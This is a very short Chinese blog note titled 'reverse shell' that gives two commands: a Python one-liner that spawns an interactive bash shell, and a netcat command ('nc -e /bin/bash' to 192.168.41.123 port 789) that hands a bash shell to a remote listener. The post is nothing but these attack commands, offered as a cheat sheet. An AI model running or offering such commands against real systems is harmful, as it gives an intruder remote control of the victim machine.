shell反弹

1.python

python -c 'import pty;pty.spawn("/bin/bash")'

2.nc

nc -e /bin/bash 192.168.41.123 789

posted @ 2021-09-05 16:37  中毒219  阅读(25)  评论(0编辑  收藏  举报